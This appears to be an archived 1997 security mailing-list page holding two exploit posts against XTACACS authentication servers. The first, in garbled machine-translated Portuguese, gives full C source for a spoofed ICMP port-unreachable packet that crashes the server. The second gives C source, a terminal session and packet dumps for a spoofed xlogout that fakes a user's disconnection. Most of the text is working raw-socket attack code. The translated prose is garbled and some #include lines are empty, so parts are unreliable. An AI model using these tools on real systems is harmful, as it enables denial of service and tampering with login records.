| Ola gente
obrigado por vizitar o site do Aspen Park
Eu dunno se que segue tem já sido postado ou não...
Triste se isto
tem sido chato.
Eu recentemente descobri que quando um ISP estava usando
servidor do XTACACS de
Vikas Aggarwal ([email protected]) em um modo do standalone, isto esteve
possível
para
faça o servidor do XTACACS colide por enviar isto tipo diferente
de ICMP
mensagens.
Para Que explora isto, você unicamente tem para
uma mensagem do ICMP unreachable
especificando unreachable de porta.
Coaxial Karma
[email protected]
--- corta aqui ---
/************************************************************************
*
* xtacacs/udp matador v1.0 por Coaxial Karma, [email protected]
* Modificado versão de nEWk.c por HyperioN
*
* Unicamente código pouco tem sido modificado: o laço para
enviar o ICMP falso
pacotes
* tem sido removido e argumentos.
*
************************************************************************/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
int size;
#define RESOLVE_QUIET
#define IPHDRSIZE sizeof(struct iphdr)
#define ICMPHDRSIZE sizeof(struct icmphdr)
unsigned char *dest_name;
unsigned char *origdest_name;
unsigned char *spoof_name = NULL;
struct sockaddr_in destaddr;
unsigned long origdest_addr;
unsigned long dest_addr;
unsigned long spoof_addr;
unsigned char type;
unsigned long seq;
int x=1;
int cize;
char *unreachables[] = {"Network unreachable",
"Host unreachable",
"Protocol unreachable",
"Port unreachable",
"Fragmantation needed and DF set",
"Source route failed",
"Network unknown",
"Host unknown",
"Source host is isolated",
"Network administratively unreachable",
"Host administratively unreachable",
"Network unreachable - type of service",
"Host unreachable - type of service"};
void banner(void)
{
printf("\nxtacacs/udp killer v1.0 by Coaxial Karma\n");
printf("modified version of nEWk.c (HyperioN)\n");
}
void usage(const char *progname)
{
printf("usage:\n");
printf("%s <source> <dest>\n\n",progname);
printf("\t<source> : address of fake ICMP packet sender\n");
printf("\t<dest> : destination of the unreach message\n");
printf("\n");
}
int resolve( const char *name, struct sockaddr_in
*addr, int port )
{
struct hostent *host;
bzero(addr,sizeof(struct sockaddr_in));
if (( host = gethostbyname(name) ) ==
NULL ) {
#ifndef RESOLVE_QUIET
fprintf(stderr,"unable to resolve host \"%s\" -- ",name);
perror("");
#endif
return -1;
}
addr->sin_family = host->h_addrtype;
memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
addr->sin_port = htons(port);
return 0;
}
int resolve_one(const char *name, unsigned
long *addr, const char *desc)
{
struct sockaddr_in tempaddr;
if (resolve(name, &tempaddr,0) == -1) {
printf("error: can't resolve the %s.\n",desc);
return -1;
}
*addr = tempaddr.sin_addr.s_addr;
return 0;
}
int resolve_all(const char *origdest,
const char *dest,
const char *spoof)
{
if (resolve_one(origdest,&origdest_addr,"origdest address"))
return -1;
if (resolve_one(dest,&dest_addr,"dest address")) return
-1;
if (spoof!=NULL)
if (resolve_one(spoof,&spoof_addr,"spoof address")) return
-1;
destaddr.sin_addr.s_addr = dest_addr;
destaddr.sin_family = AF_INET;
destaddr.sin_port = 0;
}
/*
* From ping.c (from original nuke.c)
*/
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
/* add back carry outs from top 16 bits
to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}
/*
* This from echok, but with some mods (snuke.c) for unreach.
*/
inline int icmp_unreach_send(int socket,
struct sockaddr_in *address,
unsigned char icmp_code,
unsigned long spoof_addr,
unsigned long s_addr,
unsigned long t_addr,
unsigned s_port,
unsigned t_port,
unsigned long seq)
{
unsigned char packet[4098];
struct iphdr *ip;
struct icmphdr *icmp;
struct iphdr *origip;
unsigned char *data;
int i;
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *)(packet+IPHDRSIZE);
origip = (struct iphdr *)(packet+IPHDRSIZE+ICMPHDRSIZE);
data = (char *)(packet+IPHDRSIZE+IPHDRSIZE+ICMPHDRSIZE);
memset(packet, 0, 4098);
ip->saddr = spoof_addr;
ip->daddr = t_addr;
ip->version = 4;
ip->ihl = 5;
ip->ttl = 255-random()%15;
ip->protocol = IPPROTO_ICMP;
ip->tot_len = htons(IPHDRSIZE + size + ICMPHDRSIZE + IPHDRSIZE
+ 8);
ip->check = in_cksum(packet,IPHDRSIZE);
origip->saddr = t_addr; /* this is
the 'original' header.
*/
origip->daddr = s_addr;
origip->version = 4;
origip->ihl = 5;
origip->ttl = ip->ttl - random()%15;
origip->protocol = IPPROTO_UDP;
origip->tot_len = IPHDRSIZE + 30;
origip->id = random()%69;
origip->check = in_cksum(origip,IPHDRSIZE);
*((unsigned int *)data) = htons(s_port);
*((unsigned int *)(data+2)) = htons(t_port);
*((unsigned long *)(data+4)) = htonl(seq);
/* 'original IP header + 64 bits (of bogus
TCP header)' made. */
icmp->type = 3;
icmp->code = icmp_code;
icmp->checksum = in_cksum(icmp,size+ICMPHDRSIZE+IPHDRSIZE+8);
/* the entire ICMP packet it now ready.
*/
#ifdef ICMP_PKT_DEBUG
printf("Packet ready. Dump: \n");
for (i=0;i<IPHDRSIZE+ICMPHDRSIZE+IPHDRSIZE+8;i++)
printf("%02X%c",*(packet+i),((i+1)%16) ? ' ' : '\n');
printf("\n");
#endif
return
sendto(socket,packet,IPHDRSIZE+size+ICMPHDRSIZE+IPHDRSIZE+8,0,
(struct sockaddr *)address,sizeof(struct
sockaddr));
/* ICMP packet is now over the net. */
}
void main(int argc, char * *argv) {
int s;
banner();
if (argc != 3) {
usage(argv[0]);
return;
}
type = 3;
seq=31331;
spoof_name = argv[1];
dest_name = argv[2];
origdest_name = argv[1];
resolve_all(origdest_name, dest_name,
spoof_name);
s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
#ifdef IP_HDRINCL
printf("We have IP_HDRINCL :-)\n\n");
if (setsockopt(s,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0)
{
perror("setsockopt IP_HDRINCL");
exit(1);
};
#else
printf("We don't have IP_HDRINCL :-(\n\n");
#endif
if(icmp_unreach_send(s,&destaddr,type,spoof_addr,origdest_addr,dest_addr,49,49,seq++)==
-1) {
printf("%s: error sending packet\n",argv[0]);
perror("");
return;
}
}
--- cut here ---
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com
[Note: You may have to use save-as from your browser and edit with
a text editor to recover the code. It hasn't been htmlized --Fyodor]
Date: Tue, 23 Dec 1997 11:23:43 PST
From: Coaxial Karma
To: [email protected]
Subject: Faking logout with XTACACS
Hi,
I dunno if what follows has already been
posted or not... Sorry if it
has
been.
I recently discovered that when a Terminal
Server (TS) was using XTACACS
as authentication protocol, it was possible to make the XTACACS server
believes that you've disconnected.
In order to exploit this, you only have
to send an xlogout request to
the
XTACACS server claiming to be from the TS. Here is an example:
--- begin ---
koax# taclast | grep silger | head -1
silger tty16 ts.c-a.org Thu Dec 10 10:02 still logged in
koax# ./phant0m ts.c-a.org xtacacs.c-a.org 16
koax# taclast | grep silger | head -1
silger tty16 ts.c-a.org Thu Dec 10 10:02 - 10:03 (00:01) 72
koax#
--- end ---
The first packet is the one I sent to XTACACS
authentication server and
the second one is the answer from the XTACACS authentication server to
the
TS.
10:03:24.000000 ts.c-a.org.49 > xtacacs.c-a.org.49:
udp 56
4500 5400 3412 0000 ff11 6785 cee7 d20d
cee7 d202 3100 3100 4000 0000 8007 0000
0700 0004 0000 0000 0000 0000 0000 000f
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000
10:03:24.000000 xtacacs.c-a.org.49 >
ts.c-a.org.49: udp 28
4500 3800 ce7c 0000 4011 bc07 cee7 d202
cee7 d20d 3100 3100 2400 bfe6 8002 0000
0700 0100 0000 0000 0000 0000 0000 000f
0000 0000 0000 0000
Coaxial Karma
[email protected]
--- cut here ---
/************************************************************************
*
* phant0m v1.0 by Coaxial Karma, [email protected]
* Modified version of arnudp.c v0.01 by Arny, [email protected]
*
************************************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
struct sockaddr sa;
main(int argc,char **argv)
{
int fd;
int x=1;
struct sockaddr_in *sin;
struct hostent *he;
u_char gram[84]=
{
/* IP Header */
0x45, 0x00, 0x00, 0x26,
0x12, 0x34, 0x00, 0x00,
0xFF, 0x11, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
/* UDP Header */
0x00, 0x31, 0x00, 0x31,
0x00, 0x40, 0x00, 0x00,
/* Data */
0x80, 0x07, 0x00, 0x00,
0x07, 0x00, 0x00, 0x04,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x05,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00
};
if (argc != 4)
{
fprintf(stderr, "usage: %s SRC-IP DST-IP TTY\n", *argv);
exit(1);
};
if ((he = gethostbyname(argv[1])) == NULL)
{
fprintf(stderr, "Can't resolve source hostname\n");
exit(1);
};
bcopy(*(he->h_addr_list), (gram+12), 4);
if ((he = gethostbyname(argv[2])) == NULL)
{
fprintf(stderr, "Can't resolve destination hostname\n");
exit(1);
};
bcopy(*(he->h_addr_list), (gram+16), 4);
*(u_short *) (gram + 46) = htons((u_short)
atoi(argv[3]));
sin = (struct sockaddr_in *) &sa;
sin->sin_family = AF_INET;
bcopy(*(he->h_addr_list), &(sin->sin_addr), sizeof(struct in_addr));
if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))
== -1)
{
perror("socket");
exit(1);
};
#ifdef IP_HDRINCL
if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0)
{
perror("setsockopt IP_HDRINCL");
exit(1);
};
#else
fprintf(stderr, "We don't have IP_HDRINCL.\n\n");
exit(1);
#endif
if ((sendto(fd, &gram, sizeof(gram),
0, (struct sockaddr *) sin,
sizeof(struct sockaddr))) == -1)
{
perror("sendto");
exit(1);
};
}
|